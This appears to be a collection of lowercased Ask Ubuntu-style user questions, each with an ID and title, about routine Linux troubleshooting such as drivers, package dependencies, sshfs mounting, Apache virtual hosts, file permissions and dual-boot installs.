linux-headers-3.5.0-17-lowlatency 3.5.0-17.18 linux-headers-3.5.0-17-generic 3.5.0-17.28 linux-headers-3.5.0-17 3.5.0-17.28 you should explicitly select one to install . e : package 'linux-headers ' has no installation candidate what have i done ? i 've gone through the list of linux-headers ( e.g . sudo apt-get install linux-headers-3.5.0-27-lowlatency 3.5.0-27.30 and onward ) and i receive a message that reads as follows : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package x.x.x-x.x e : could n't find any package by regex 'x.x.x-x.x' granted this article may be pretty old , i think perhaps the final line e : package 'linux-headers ' has no installation candidate means they could 've been taken down . my specifications ubuntu 12.10 os type : 64 bit
283679	automatically mount/umount sshfs on vpn-up and vpn-down	this problem is really frustrating me . i have the following script to mount/unmount a sshfs upon a vpn connection ( vpn-up ) and vpn-down . i have this script in /etc/networkmanager/dispatcher.d/ directory . when i run the script manually saying `` sudo mount-on-vpn asdf vpn-up '' it runs fine . but whenever networkmanager wants to run it it fails and the syslog says `` script exited with error -1 '' . i debugged it a lil bit and found that it fails in the `` sshfs username @ host : ... . '' i am pretty sure the options are correct because when i run the same command ( by copy/pasting ) on the console it works . any idea what could be going wrong here ? the directories /media/host-common and /meidia-home are all owned by the username and set to 777 as permission . # ! /bin/sh -e if [ -z `` $ 1 '' ] ; then echo `` $ 0 : called with no interface '' 1 > & 2 exit 1 ; fi logger `` looking at case '' case `` $ 2 '' in vpn-up ) logger `` inside vpn-up '' sshfs username @ host : /home/common /media/host-common sshfs username @ host : /home/username /media/host-home logger `` mounted all drives '' ; ; vpn-down ) logger `` inside vpn-down '' fusermount -u /media/host-common fusermount -u /media/host-home logger `` unmounting all drives '' ; ; * ) logger `` inside * '' echo `` $ 0 : called with unknown action \` $ 2 ' '' 1 > & 2 logger `` exiting '' exit 1 ; ; esac
283681	why are different libreoffice applications grouped together on unity launcher ?	when opening a writer window for instance and a calc window - any 2 different lo applications really - the icons on unity launcher are grouped together under a general libreoffice icon . how can they be separated into their own program icons ? they appear normally in cairo-dock . is this a known bug ? i 'm using ubuntu 12.10 , fully updated with libreoffice 3.6.6.2 . thanks ! !
283682	start xserver + libreoffice with no gui	i am wondering how to start libreoffice in tty8 from tty1 . i tried startx -- :1 but then how do i lauch libreoffice ? using the above command is it possible to chose tty9-12 ?
283687	redirect speaker output to microphone	can i redirect the output of the speakers to my microphone ? i do n't want to turn on the speakers . what i want to achieve is , say i 'm doing a video chat and want the other person to listen to the sound . i 'd like the sound from the speakers to be routed to the microphone . it 'd be helpful while i 'm using headphones .
283689	why are there different keyboard commands for quitting applications ?	some applications , like evince , wo n't respond to ctrl+q and instead require ctrl+w . other applications , like movie player , wo n't respond to ctrl+w , and instead require ctrl+q . why is this ? are there plans to standardize this behavior across ubuntu ( at least the applications that come with the standard install ) ?
283690	error when installing ubuntu with windows installer	i 'm trying to install ubuntu 12.04.2 lts with windows installer . i downloaded this version from http : //www.ubuntu.com/download/desktop/windows-installer and did as it says on instructions , all good until i reboot . when i reboot a message appear and i just ca n't continue the ubuntu instalation . i took a picture of the message : my computer is an asus series k55v with cpu intel i5 and i 'm using windows 7 . if you could help , i really do n't know what 's wrong .
283696	unable to install netflix	i have tried to install netflix but i get stuck sudo apt-add-repository ppa : ehoover/compholio sudo apt-get update sudo apt-get install netflix-desktop after the 3rd command i get a disclaimer but do not know how to pass it to continue the installation it is as follows : | 3 . copyright . all title and copyrights in and to the software product ( including but not limited to any images , text , and `` applets '' │ incorporated into the software product ) , the accompanying printed materials , and any copies of the software product are owned by │ microsoft or its suppliers . the software product is protected by copyright laws and international treaty provisions . therefore , you │ must treat the software product like any other copyrighted material . │ │ 4 . u.s. government restricted rights . the software product and documentation are provided with restricted rights . use , duplication , or │ disclosure by the government is subject to restrictions as set forth in subparagraph ( c ) ( 1 ) ( ii ) of the rights in technical data and │ computer software clause at dfars 252.227-7013 or subparagraphs ( c ) ( 1 ) and ( 2 ) of the commercial computer software - restricted rights │ at 48 cfr 52.227-19 , as applicable . manufacturer is microsoft corporation/one microsoft way/redmond , wa 98052-6399 . │ │ limited warranty │ │ no warranties . microsoft expressly disclaims any warranty for the software product . the software product and any related documentation │ is provided `` as is '' without warranty of any kind , either express or implied , including , without limitation , the implied warranties or │ merchantability , fitness for a particular purpose , or noninfringement . the entire risk arising out of use or performance of the │ software product remains with you . │ │ no liability for consequential damages . in no event shall microsoft or its suppliers be liable for any damages whatsoever ( including , │ without limitation , damages for loss of business profits , business interruption , loss of business information , or any other pecuniary │ loss ) arising out of the use of or inability to use this microsoft product , even if microsoft has been advised of the possibility of │ such damages . because some states/jurisdictions do not allow the exclusion or limitation of liability for consequential or incidental │ damages , the above limitation may not apply to you . │ │ miscellaneous │ │ if you acquired this product in the united states , this eula is governed by the laws of the state of washington . │ │ if this product was acquired outside the united states , then local laws may apply . │ │ should you have any questions concerning this eula , or if you desire to contact microsoft for any reason , please contact the microsoft │ subsidiary serving your country , or write : microsoft sales information center/one microsoft way/redmond , wa 98052-6399 . │ │ reference : http : //www.microsoft.com/typography/fontpack/eula.htm │ │ < ok > │ │ └──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘ please help me get past this
283698	how do you implement a progress bar using python / glade web browser	im trying to get the progressbar in glade to work in conjunction with my web browser . what i want to happen is the progress bar shows how far along a page is being loaded . i have scoured the internet looking for a way to implement this but i have found nothing . im using glade in conjunction with python ( its all being created using quickly if that helps ) . the web browser is also using webkit and webview . has anyone got any ideas on how i can script the progress bar so it works properly ?
283702	how to install nvidia geforce gtx 675m in ubuntu ?	can someone tell me the steps to install nvidia geforce gtx 675m ? my laptop is a samsung series 7 np700g7c-s01us . i have ubuntu 12.10 .
283703	ufw 'default deny incoming ' does n't work	i have ufw enabled , 'default deny incoming ' set and no any additional rules , but i still can access all ports from other pcs . i have to manually block each port . what can be wrong ?
283704	installing new ati drivers , running into issues	i 'm trying to install `` amd-driver-installer-catalyst-13.1-linux-x86.x86_64 '' for my hd 7850 , but i 'm having issues getting my old driver uninstalled ( which i got from `` fglrx-updates '' under software sources ) . i followed the instructions in `` how do i remove the fglrx drivers after i 've installed them by hand ? `` , but once the second command finished , the drivers were still detected by the installer i first mentioned . would i need to restart or use an entirely different command ? the last thing i would want to do is screw up my graphics . thanks .
283706	sudo environment	is there a way to use config files for use with sudo ? for example a .bashrc , .gitconfig , or an emacs init.el specifically i wanted to get lscolors in sudo commands . i know that i can put these variables in the environment . eg . in .bashrc : export lscolors = ... alias sudo='sudo -e' then run sudo sudo ... but i am wondering if there is another way to setup defaults for sudo .
283711	application focus of emacsclient frame	i use emacs24 and i usually start emacs as a daemon at start then use emacsclient frames . but i 've encountered a problem : after i created the first frame , then whenever i created a new frame ( after the first frame is closed ) there would be a system message `` emacs24 @ myusername '' is ready popped out so that the new frame loses focus ( the focus is on the message ) , which is rather annoying . it seems that it is because even if i close all frames some buffers are still open ( like scratch and messages ) . i am just wondering if there is a way to prevent the system message from popping out ? thanks ! edit : forgot to mention that i am using gnome 3 .
283712	how to get wireless working on macbook pro 8,1 ?	are there any `` new user friendly '' ways to get wireless working with macbook pro 8,1 ? i tried : sudo apt-get install linux-firmware-nonfree and it went through a long terminal process that looked promising , however when i try to set up my wireless connection , it does n't recognize that wireless even exists it seems like .
283720	kubuntu 12.10 on my compaq presario keeps locking up .	almost every time i switch my power from battery to ac or unplug it , the screen goes black as if it 's asleep and i ca n't get it back . i used to be able to hit the switch that the top part of my laptop hits to make it think it was closed which would reset the issue but that does n't work any more . recently , when i 'm not using my laptop and it goes in to sleep mode . naturally , it does n't come out of it and i have to restart my pc just to get the screen to come back on . i 'm new to kubuntu/ubuntu and i have 12.10 on an older compaq presario . if you explain something to me i may not know any of the special jargon exclusive to programers .
283723	issues with uefi and windows 8	i have read with interest all the discussions about windows 8 and uefi i have an asus and whilst it took some time , i managed to go into the uefi and find and change the required settings i then was able to boot from a usb and installed lubuntu , but not as a dual boot - i got rid of windows 8 completely my issue now is i still ca n't boot from usb my install of lubuntu is working fine , but what if i want to try another distro ? the only way i got to boot from usb was from within w8 and selecting the boot from usb option in the settings section and the only way i was able to get into the uefi settings was also from within w8 now with w8 gone , is there anyway to get into uefi ? under bios it was as simple as pressing f8 or f2 etc . thanks
283727	get a webpage from a local service	i was using the google-desktop 's service for ubuntu ( the abandoned package ) . you can get google-desktop search results on a webpage in the browser . i was wondering if there is a way to get that webpage using the wget command or any other way to get the page in the terminal . the url that shows on the location bar for google-desktop search is : localhost:33327/search ? flags=8 & hl=en_us & num=10 & q=hemingway & start=0 & s=jd1g1cwkjb88gsz1epb3lvgcswo this sample url for the search query hemingway shows on my computer .
283734	backing up nas to nas	i am pretty new to ubuntu . i have yet to really use it 's full functionality ( ie command lines ) . i 'm using an older laptop to set it up to run as a media server using plex . i was hoping to use it to sync my 2 wd my book live nas drives automatically . one nas drive is used to store all of my media the other is to backup that same media . so my setup is basically this ubuntu 12.04 . the laptop will be directly wired to the router that the 2 nas drives are connected to . i would like to have it sync at least once a week , but preferably once a day ( each day being a different folder/folders ) . in addition my plex media will be stored on a normal wd external plugged directly into the laptop . i would also like this to be sync 'd daily . is this a complicated setup for the syncing ? where do i begin ?
283735	dual boot mac / ubuntu mac single user mode ?	i have a macbook air running mac mountain lion on one partition , and ubuntu 12.10 on the other . whenever it takes me to the ubuntu startup option of : ubuntu more ubuntu details mac 32-bit mac 64-bit choosing the mac 64-bit option just shows a blank screen of the background color of the previous menu . the only way to get to the mac partition is by holding down option and choosing it there . then , however , it goes straight to boot and does n't accept any more hotkeys . and if i try holding down command-s at the beginning , nothing happens at all .
283745	unable to access/mount 2nd hard drive in laptop	i am totally new to linux so i basically do not have a clue . i have installed ubuntu on my laptop and it is running very nice apart from the fact i can not access my second hard drive . i replaced the dvd drive with a hard drive caddy which slots into the laptop where the dvd normally goes . it looks like it uses a sata connector . the hard drive contains a ntfs partition with most of my work on . the problem i have is that i do not even know where to start mounting the drive or even find out if ubuntu can see it . any help is much appreciated .
283746	i 've made a mistake keeping the `` obsolete packages '' upgrading from ubuntu 12.04 to 12.10	how do i get back to that point , so i can confirm to not keep the `` obsolete packages '' for ubuntu 12.10 work normally ? with the packages i 've kept it 's working much slower and i think it 's because of my wrong action .
283747	how can i burn a video dvd ?	i 've been trying all day to make a simple video dvd to play on a regular dvd player , but i just ca n't seem to figure to out . i do n't understand what an image is and all the apps that i 've tried today seem to use this same terminology . i tried brasero , k3b , devede , and a few others . i have read here in the forum and in other threads that these were the ones that people seem to use . i just ca n't seem to create a dvd . i do n't know that burning an image means or anything . i used windows for years and absolutely love and prefer ubuntu now , but i just miss how easy windows software was in creating dvds . select a file ( s ) and press burn and that was it . can some please help me out on this . i know i sound like a total noob , but i really , truly do n't understand any of this burning dvds here ... ..yet
283748	alsa sound not loading	i recently read a post from one of the boffins to use the killall command in terminal . i have tried that on numerous occasions with mixed results . sometimes it works . i run an old acer aspire 3201 . up until 12.04 the sound worked fine , but since the last 2 upgrades alsa does n't load on boot , nor does it load the start-up sound . when i run killall pulseaudio ; rm ~/.pulse* , then reboot sometimes it works , but mostly it does n't . second , the terminal comes up with message that says it ca n't remove pulse because it is a directory . the problems with sound are driving me nuts . how do i get it working again so that it loads on start-up ? or how do i roll back to 12.04 which was the last stable platform ?
283749	command on hibernate 13.04	now i am currently fiddling with switcheroo on my laptop and am slowly figuring it out . though i seem to be hitting a hiccup when it comes to hibernation . upon hibernating and waking the laptop back up it seems as if switcheroo hits a snag . while the command cat /sys/kernel/debug/vgaswitcheroo/switch reports back with the current state of my two graphics processors and reports that the dis graphics processor is not powered on and is off while at the same time my fan is full boar giving out a decent amount of heat as if the dis adapter were on . now one would think just execute the commands again but i seem to hit yet another snag upon reactivating the dis adapter using the on command for switcheroo the system with process for a moment , the fan will spin down as if it turned off the dis adapter and the screen will turn black with nothing but my cursor . and using the off command instead of the on command in the same situation yields no result . now this only happens when i hibernate at least once otherwise i can turn the dis adapter on and off all i want with no repercussions . now this leads me to think there is a bug and i plan on to report my findings soon in the mean time is there a way to execute commands upon hibernating and coming out of hibernate . i ask because maybe if i execute the on command for switcheroo upon hibernating and then the off command for the dis adapter i can work around a problem here .
283751	running 12.04 from usb drive or sdxc	i am trying to install ubuntu 12.04 on to a usb thumb drive ( 8gb ) or a micro sd card ( 64gb ) . the ubuntu installer is saying that it wo n't work , and i ca n't figure out why . i am using a 2011 macbook air . any help here would be sweet ! thanks !
283752	when using ubuntu with the kubuntu desktop it asks me to install rails	recently i installed kubuntu ( http : //www.kubuntu.org/ ) to improve the speed of using ubuntu . neverhteless when i try to run my rails applications with the command `` rails s '' i get the following error : the program 'rails ' can be found in the following packages : * rails * ruby-railties-3.2 rails is installed properly and i use it all the time when i use the desktop version of kubuntu i get this errror ...
283753	problem with video driver ( nvidia geforce gt 650m ) in lenovo ideapad y500 with ubuntu 12.04	the screen resolution can not be assigned . it indicates that it is 1920 x 1080 but everything looks very small . the screen brightness can not be allocated from the system .
283760	ubuntu installation failed every time after choosing `` install ubuntu alongside window 7 ''	i want to install ubuntu with window 7 as a dual boot pc . after booting from pendrive when i choose `` intall ubuntu on hard disk '' , then installation window comes , i choose `` do not connect to wifi right now '' . then choose `` installation type alongside window 7 '' . after clicking `` continue '' a black scrren comes for 2 seconds and then my pc again restart and window 7 starts every time . ( after step 4 as mention on http : //www.ubuntu.com/download/help/install-desktop-latest ) i am using my pen drive to boot ( i made it ubuntu bootable from http : //www.pendrivelinux.com ) and i tried this installation using wifi connected and disconnected as well as.but i prefer to disconnected during installation.and these are not the actual problem . ( after booting from pen drive selecting after install ubuntu on hard disk it goes to select language option and then prepare to install ubuntu and after the step `` install alongside window7 '' pc again boot to window 7 ( that is the problem ) . but first and second time after boot instead of installation window it directs into a black screen command modes where lots of commands are shown and it shows write help command.then i am unable to do anything and have to turn off my laptop with power key . ) i want to install ubuntu in d drive alongside window 7 . is it okay or wrong and how to do this . but actual problem is my ubuntu installation fails after selecting `` install ubuntu alongside window7 '' i am using ubuntu 12.04 desktop- i38.iso ( 735,358,976 bytes ) md5sum is : d791352694374f1c478779f7f4447a3f laptop model : compaq presario cq62 -112tu ram : 2 gb intel i5 430 m processor 290 gb hdd : c drive 29.2 gb free of 49 gb ; d drive 121 gb free of 122 gb and e drive 21.3 gb free of 127 gb and hdd is simple ( not dynamic ) please help ! ! ! ! thanks in advance .
283761	geforce 8600m gt : nouveau performance better than proprietary driver ?	after installing ubuntu 12.10 on this computer , i installed nvidia 's proprietary driver , since i might want to play a few games . i soon started having problems with video and audio . i 'd be watching a youtube video , and it 'd frequently “stutter” , that is , repeat the last few seconds of audio or skip a few seconds . the same happened while listening to some music , from either rhythmbox or banshee . i booted up ubuntu 13.04 from a usb stick and noticed that video and audio ran smoothly . i then attributed that to improvements to packages since version 12.10 , and installed 13.04 on the machine instead . i installed the nvidia-current package right after booting into the system , and problems persisted . nvidia-current-upgrades , nvidia-experimental and other packages had the same problem . i then thought that my problems could be related to the driver in use , since the livecd uses nouveau . i then replaced nvidia-current by nouveau and voilà , everything works just fine . my question is : is there any tweaking required in order to get the proprietary driver running smoothly with the geforce 8600m gt ? i want to be able to play games and nvidia 's driver has better 3d accelaration support , from what i 've read . here is the output of lspci : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:01.0 pci bridge : intel corporation mobile pm965/gm965/gl960 pci express root port ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 03 ) 01:00.0 vga compatible controller : nvidia corporation g84m [ geforce 8600m gt ] ( rev a1 ) 04:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) 0c:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 0e:06.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 0e:06.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 0e:06.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 )
283762	write permission error	i have transmission-deamon running and it 's giving me the error permission denied : /mnt/rynet/downloads/the-torrent/some-file.ext so it can not write files to the download directory : ryguy @ mpu /mnt/rynet $ id debian-transmission uid=120 ( debian-transmission ) gid=132 ( debian-transmission ) groups=132 ( debian-transmission ) ,117 ( sambashare ) ryguy @ mpu /mnt/rynet $ ps aux | grep transmis 120 16184 0.2 0.3 57724 12644 ? ssl 22:17 0:11 /usr/bin/transmission-daemon -f -- config-dir /var/lib/transmission-daemon/info ryguy @ mpu /mnt/rynet $ ls -alh total 100k drwxrwx -- - 16 root sambashare 4.0k apr 15 21:36 . drwxr-xr-x 5 root root 4.0k dec 4 08:20 .. drwxrwxrwx 4 root sambashare 4.0k apr 20 05:30 downloads but , i have the download directory permissions set to 777 , owned by group sambashare . the transmission-deamon is running as debian-transmission user/group and the debian-transmission user is in group sambashare . even stranger , when i set the debian-transmission user 's shell to /bin/bash and login via su , i can easily issue commands such as touch /mnt/rynet/downloads/testfile with no errors and it creates the testfile just fine . so , why ca n't transmission-deamon write files to the download directory ?
283763	trouble with local server , url not found errors with some , but not all local sites	i am setting up my ubuntu laptop for my new job and i am having a strange issue . they have a crazy environment setup that i got working on my local ubuntu 12.10 machine with apache and php 5.3 ( had to downgrade from 5.4 ) . i am able to get the custom app working locally . but when i tried to create a second ( and third ) simple local site that just uses an index.php file ( i want to test some things with phpunit ) i keep getting not found ( 404 ) errors . what i did was created two entries in /etc/hosts that are `` 127.0.0.1 test.local '' and `` 127.0.0.1 test.localhost '' . from there i added to my virtualhosts.conf file ( which apache is loading ) the following : < virtualhost *:80 > documentroot `` /virtualhosts/other-sites/test '' servername test.local serveralias test.localhost serveralias test.ptlaptop.dev options followsymlinks rewriteengine on serversignature on directoryindex index.html index.php < directory `` /virtualhosts/other-sites/test '' > options indexes allowoverride all order allow , deny allow from all options followsymlinks < /directory > < /virtualhost > this virtualhosts file sites in /etc/apache2/sites-available and is referenced in apache2.conf using `` include sites-enabled/ '' . in that folder there are symlinks that reference to all of the files in `` sites-available '' . in any case the custom app requires some settings in there to operate , so it would have to be loaded . further i have the folder and file for test.local situated in the same base location `` /virtualhosts '' as the custom app . they have the same permissions and owner ( me ) . i have even tried copying the `` .htaccess '' file from the custom app to see if something about it did the trick . but nothing seems to be working . also , before anyone suggests this , i have restarted apache a bunch of times using `` sudo /etc/init.d/apache2 restart '' . so that is n't the problem either . i have even rebooted the machine . one last thing , in the hosts file i had to add a line at the top that says `` 127.0.1.1 ptlaptop ptlaptop.dev '' . i 'm not sure if that would be causing this problem or not . so i am not sure why this is giving me so many problems . any suggestions ? thanks !
283766	prevent x/gnome/terminal from catching emacs commands	when i use emacs , i often end up typing many exciting key combinations which i would usually not use , such as c-m-t ( i.e . ctrl - alt - t ) , which in emacs is supposed to run the command transpose-sexps ; however , since x or gnome ( i 'm not sure which ) is catching this event , this has the actual effect of opening a terminal . nevertheless , i enjoy and am used to having the functionality to open a new terminalâprovided that i do n't have emacs open . so , is there any way to temporarily disable all keyboard shortcuts whenever the current focus is on emacs ? n.b . i happen to be using the non-graphical version of emacs emacs-nox , so i in fact usually have a terminal running emacs , not a graphical emacs window .
283768	alternatives to tor	does anyone know of a faster alternative to the tor browser and network for maintaining privacy ? i would like to set up a transparent proxy to access the internet in a way that prevents my isp from connecting me to my ip address . anyway , do advise . should i steal into an office with an internet connection , set up an official looking box in their router room , and call it a day ?
283774	i can not boot my ubuntu desktop	i 'm new to managing hard disks , and was editing partition table . today , i accidentally restarted my ubuntu after deleted partition ( /dev/sda1 , /dev/sda2/ , /dev/sda5 ) and before create new partition table by using fdisk command . of course , i can not boot this and have to struggle with initramfs program . in this environment , how we should create new partition ? i can not use fdisk command now and have no idea what program i should use . thank you .
283777	ssd options in /etc/fstab stop machine from booting	i just recently installed 12.10 on a new lenovo t430 , and added these options in \etc\fstab : discard , relatime to \sda1 on which \ is installed . when i rebooted , i got an error claiming that it couldnât read \ , and got thrown into a read-only shell , which necessitated booting from a rescue disk to revert to the original fstab . so : what are the correct options for ssd , and how can i make sure i wo n't get locked out of the system again ?
283780	please help me speedup my ubuntu 12	top - 08:28:09 up 12:59 , 2 users , load average : 0.59 , 0.47 , 0.35 tasks : 200 total , 1 running , 199 sleeping , 0 stopped , 0 zombie cpu ( s ) : 7.1 % us , 2.7 % sy , 0.0 % ni , 88.1 % id , 2.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 3981656k total , 3817680k used , 163976k free , 145792k buffers swap : 8910840k total , 25940k used , 8884900k free , 632852k cached pid user pr ni virt res shr s % cpu % mem time+ command 1784 cassandr 20 0 2828m 1.4g 16m s 6 35.7 1:18.35 jsvc 5250 dev 20 0 1537m 195m 47m s 6 5.0 4:19.77 spotify 1202 root 20 0 307m 188m 16m s 4 4.8 2:05.38 xorg 2972 dev 20 0 1501m 368m 29m s 3 9.5 1:52.79 compiz 5274 dev 20 0 586m 17m 10m s 1 0.4 0:02.33 gnome-terminal 2944 dev 20 0 28020 3712 608 s 1 0.1 0:03.83 dbus-daemon 2981 dev 9 -11 421m 5864 3612 s 0 0.1 0:15.76 pulseaudio 3005 dev 20 0 628m 15m 10m s 0 0.4 0:00.17 nm-applet 3083 dev 20 0 388m 10m 7100 s 0 0.3 0:02.48 bamfdaemon 5485 root 20 0 17440 1476 1040 r 0 0.0 0:06.14 top 6091 dev 20 0 716m 88m 40m s 0 2.3 0:03.06 chrome 6255 dev 20 0 925m 76m 28m s 0 2.0 0:02.26 chrome 1 root 20 0 24564 2356 1288 s 0 0.1 0:02.40 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:01.72 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.63 migration/0 7 root rt 0 0 0 0 s 0 0.0 0:00.12 watchdog/0 8 root rt 0 0 0 0 s 0 0.0 0:00.46 migration/1 10 root 20 0 0 0 0 s 0 0.0 0:01.44 ksoftirqd/1 12 root rt 0 0 0 0 s 0 0.0 0:00.07 watchdog/1 13 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset 14 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper 15 root 20 0 0 0 0 s 0 0.0 0:00.00 kdevtmpfs 16 root 0 -20 0 0 0 s 0 0.0 0:00.00 netns my system used to be real fast ( dell optiplex 745 w 4 gb memory ) but now i think that i installed so many applications and that i got that many background processes so that it slows down my system . i 'm wondering if you can help me speedup my system , for instance , i recently instsalled the apache project `` cassandra '' ( the datastore app from apache ) which was sort of good but it was just a test and i 'm suspecting that the cassandra application could be one of some unneccessary applications that i could remove . could you give me some suggestions how i can improve ? thanks update i removed cassandra which seem to have helped much . thanks ! $ sudo apt-get remove cassandra [ sudo ] password for dev : läser paketlistor ... färdig bygger beroendeträd läser tillståndsinformation ... färdig följande paket har installerats automatiskt och är inte längre nödvändiga : libjna-java jsvc libopts25 ntp libcommons-daemon-java använd `` apt-get autoremove '' för att ta bort dem . följande paket kommer att tas bort : cassandra 0 att uppgradera , 0 att nyinstallera , 1 att ta bort och 0 att inte uppgradera . efter denna åtgärd kommer 14,8 mb att frigöras på disken . vill du fortsätta [ j/n ] ? j ( läser databasen ... 664964 filer och kataloger installerade . ) tar bort cassandra ... xss = -ea -javaagent : /usr/share/cassandra/lib/jamm-0.2.5.jar -xx : +usethreadpriorities -xx : threadprioritypolicy=42 -xms1024m -xmx1024m -xmn200m -xx : +heapdumponoutofmemoryerror -xss240k hanterar utlösare för python-support ... hanterar utlösare för ureadahead ... dev @ dev-optiplex-745 : ~ $ sudo apt-get autoremove läser paketlistor ... färdig bygger beroendeträd läser tillståndsinformation ... färdig följande paket kommer att tas bort : jsvc libcommons-daemon-java libjna-java libopts25 ntp 0 att uppgradera , 0 att nyinstallera , 5 att ta bort och 0 att inte uppgradera . efter denna åtgärd kommer 2 858 kb att frigöras på disken . vill du fortsätta [ j/n ] ? j ( läser databasen ... 664861 filer och kataloger installerade . ) tar bort jsvc ... tar bort libcommons-daemon-java ... tar bort libjna-java ... tar bort ntp ... * stopping ntp server ntpd [ ok ] tar bort libopts25 ... hanterar utlösare för man-db ... hanterar utlösare för doc-base ... behandlar 1 removed doc-base file ... hanterar utlösare för ureadahead ... hanterar utlösare för libc-bin ... ldconfig deferred processing now taking place $ now the ouput from top is : top - 02:08:28 up 6 days , 17:49 , 2 users , load average : 2.31 , 2.80 , 2.08 tasks : 215 total , 1 running , 210 sleeping , 0 stopped , 4 zombie cpu ( s ) : 7.5 % us , 9.9 % sy , 0.0 % ni , 76.9 % id , 5.0 % wa , 0.0 % hi , 0.7 % si , 0.0 % st mem : 3981656k total , 3875928k used , 105728k free , 33972k buffers swap : 8910840k total , 739692k used , 8171148k free , 2284296k cached pid user pr ni virt res shr s % cpu % mem time+ command 29893 dev 20 0 1210m 56m 8092 s 21 1.5 19:10.28 /usr/bin/deluge 1217 root 20 0 424m 187m 16m s 9 4.8 192:14.43 xorg 2657 dev 20 0 1567m 201m 21m s 5 5.2 262:28.26 compiz 32020 dev 20 0 586m 16m 9808 s 1 0.4 0:00.80 gnome-terminal 32004 dev 20 0 922m 73m 20m s 1 1.9 0:05.87 chrome 10 root 20 0 0 0 0 s 0 0.0 0:26.38 ksoftirqd/1 380 root 20 0 17456 1476 1036 r 0 0.0 0:00.02 top 1 root 20 0 24576 1976 1084 s 0 0.0 0:02.60 init 2 root 20 0 0 0 0 s 0 0.0 0:00.07 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:40.31 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:16.35 migration/0 7 root rt 0 0 0 0 s 0 0.0 0:02.00 watchdog/0 8 root rt 0 0 0 0 s 0 0.0 0:04.78 migration/1 12 root rt 0 0 0 0 s 0 0.0 0:01.70 watchdog/1 13 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset 14 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper 15 root 20 0 0 0 0 s 0 0.0 0:00.00 kdevtmpfs
283781	how to know the installed ubuntu version is beta2 or final release	for example , i haved install ubuntu 13.04 beta2 and sudo apt-get update & upgrade , and lsb_release shows : distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring but can not find beta 2 symbol . does that mean upgraded to final release ?
283782	how to fix missing dependency	i was trying to install ruby and was disconnected in-between , so i was unable to install all dependencies . now i ca n't run ruby because of the missing dependencies . also , i am unable to reinstall this application . please help me to solve this issue .
283785	dependency error while installing cinnamon	i get following error while installing cinnamon sudo apt-get install cinnamon reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cinnamon : depends : gir1.2-muffin-3.0 but it is not going to be installed depends : libgjs0-libmozjs185-1.0 but it is not installable depends : libgjs0c ( > = 1.34.0 ) but 1.32.0-1ubuntu1 is to be installed depends : libgnome-desktop-3-4 ( > = 3.2.0 ) but it is not installable depends : libmuffin0 ( > = 1.1.1 ) but it is not going to be installed recommends : gnome-themes-standard but it is not going to be installed recommends : gnome-session-fallback but it is not going to be installed recommends : nemo but it is not going to be installed e : unable to correct problems , you have held broken packages . i tried everything on this : how do i resolve unmet dependencies ? but still unable to install . please help
